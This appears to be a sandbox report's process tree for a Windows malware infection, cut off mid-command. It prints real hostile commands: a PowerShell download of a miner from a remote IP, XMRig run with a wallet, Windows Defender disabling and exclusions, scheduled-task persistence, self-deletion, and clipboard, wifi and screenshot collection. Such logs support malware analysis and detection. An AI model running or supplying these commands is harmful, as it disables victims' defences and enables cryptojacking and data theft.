C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3380,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3352 /prefetch:15⤵PID:4404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4448,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3404 /prefetch:15⤵PID:728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4644,i,57428949481673668,16289333251946298005,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:15⤵PID:4020
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"2⤵
- Executes dropped EXE
PID:2416
-
-
C:\Users\Admin\AppData\Local\Temp\a\Bootxr.exe"C:\Users\Admin\AppData\Local\Temp\a\Bootxr.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4880 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"3⤵
- System Location Discovery: System Language Discovery
PID:2488 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe3⤵
- System Location Discovery: System Language Discovery
PID:1308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
-
C:\WinXRAR\xmrig.exeC:\WinXRAR\xmrig.exe -o xmr-us-east1.nanopool.org:14444 -u 47n193Tag3FHULdsD1HYmYGPdfCpquhdci1Rq2L4gR4U5Diq8oX6ny73xRqb4DwWYBTuQQF3Xa36AQFNjCCX71nAMeYiG4t -p x --algo rx/03⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:444
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\.exe"C:\Users\Admin\AppData\Local\Temp\a\.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:804
-
-
C:\Users\Admin\AppData\Local\Temp\a\diskutil.exe"C:\Users\Admin\AppData\Local\Temp\a\diskutil.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2384
-
-
C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3200 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\systempreter.exe"C:\Users\Admin\AppData\Local\Temp\a\systempreter.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe"C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4504 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe" & rd /s /q "C:\ProgramData\16PP890HDJM7" & exit3⤵
- System Location Discovery: System Language Discovery
PID:4564 -
C:\Windows\SysWOW64\timeout.exetimeout /t 104⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe"C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3432 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\ghjaedjgaw.exe" & rd /s /q "C:\ProgramData\JECTJECTRI58" & exit3⤵
- System Location Discovery: System Language Discovery
PID:2572 -
C:\Windows\SysWOW64\timeout.exetimeout /t 104⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\DuckMatter.exe"C:\Users\Admin\AppData\Local\Temp\a\DuckMatter.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1488 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Camcorders Camcorders.cmd & Camcorders.cmd3⤵
- System Location Discovery: System Language Discovery
PID:3112 -
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"4⤵
- System Location Discovery: System Language Discovery
PID:2896
-
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"4⤵
- System Location Discovery: System Language Discovery
PID:1308
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 1217594⤵
- System Location Discovery: System Language Discovery
PID:3668
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Including4⤵
- System Location Discovery: System Language Discovery
PID:4888
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Contracts" Food4⤵
- System Location Discovery: System Language Discovery
PID:1428
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dial + ..\Reaction + ..\Rw + ..\More C4⤵
- System Location Discovery: System Language Discovery
PID:4540
-
-
C:\Users\Admin\AppData\Local\Temp\121759\Conditioning.comConditioning.com C4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\121759\Conditioning.com" & rd /s /q "C:\ProgramData\K6XB16XBA1NY" & exit5⤵
- System Location Discovery: System Language Discovery
PID:4164 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4756
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 54⤵
- System Location Discovery: System Language Discovery
PID:3264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\microsoft-onedrive.exe"C:\Users\Admin\AppData\Local\Temp\a\microsoft-onedrive.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2744 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYwBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwB5ACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"3⤵
- Executes dropped EXE
PID:3704 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:2560 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"5⤵PID:2668
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:3208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵PID:3956
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
PID:396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:4564
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:4804
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵PID:1492
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵PID:2044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵PID:344
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵PID:1108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:4224
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:1028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:2112
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""5⤵
- Hide Artifacts: Hidden Files and Directories
PID:1636 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"6⤵
- Views/modifies file attributes
PID:5036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​​  .scr'"5⤵PID:3004
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​​  .scr'6⤵
- Command and Scripting Interpreter: PowerShell
PID:1108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:544
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:2188
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:1400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:3232
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵PID:8
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
PID:3916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
PID:4676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:4316
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:4428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:1840
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:3944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1112 -
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:4044
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:5104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"5⤵PID:2248
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath6⤵PID:1832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:1948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACA